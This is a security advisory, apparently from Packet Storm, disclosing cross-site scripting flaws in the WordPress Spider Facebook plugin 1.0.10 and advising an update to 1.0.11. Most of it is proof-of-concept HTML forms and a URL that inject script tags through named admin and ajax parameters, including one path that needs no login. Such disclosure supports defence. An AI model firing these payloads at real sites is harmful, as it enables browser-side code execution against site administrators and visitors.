WordPress Spider Facebook plugin version 1.0.10 suffers from multiple cross site scripting vulnerabilities.
05c4987140e7f12d38505e7a14c7e9256274ef46f188e1ab56081077a84daa69Title: WordPress 'WordPress Facebook' plugin - XSS
Version: 1.0.10
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/spider-facebook/
Contacted WordPress: 2015/01/26
==========================================================
## Description:
==========================================================
Spider Facebook is a WordPress integration tool for Facebook.It includes all the available Facebook social plugins and widgets to be added to your web
## XSS:
==========================================================
Some parameters are shown unsanitized, making XSS possible.
PoC:
Log in as admin an submit one of the following forms:
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage">
<input type="text" name="asc_or_desc" value=""/><script>alert(1)</script>"><br />
<input type="text" name="order_by" value=""/><script>alert(2)</script>"><br />
<input type="text" name="page_number" value=""/><script>alert(3)</script>"><br />
<input type="text" name="serch_or_not" value=""/><script>alert(4)</script>"><br />
<input type="submit">
</form>
<form method="POST" action="http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&">
<input type="text" name="search_events_by_title" value=""/><script>alert(1)</script>"><br />
<input type="text" name="page_number" value=""/><script>alert(2)</script>"><br />
<input type="text" name="serch_or_not" value=""/><script>alert(3)</script>"><br />
<input type="text" name="asc_or_desc" value=""/><script>alert(5)</script>"><br />
<input type="text" name="order_by" value=""/><script>alert(6)</script>"><br />
<input type="submit">
</form>
Also works with this target url: http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook&
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=Spider_Facebook_manage">
<input type="text" name="search_events_by_title" value=""/><script>alert(1)</script>"><br />
<input type="text" name="serch_or_not" value="search" READONLY><br />
<input type="submit">
</form>
Also works with http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& and http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&
You can also just visit the following URL (no login required):
http://[URL]/?task=registration&g_red=1&type=auto&appid=%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E
## Solution
==========================================================
Update to version 1.0.11
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed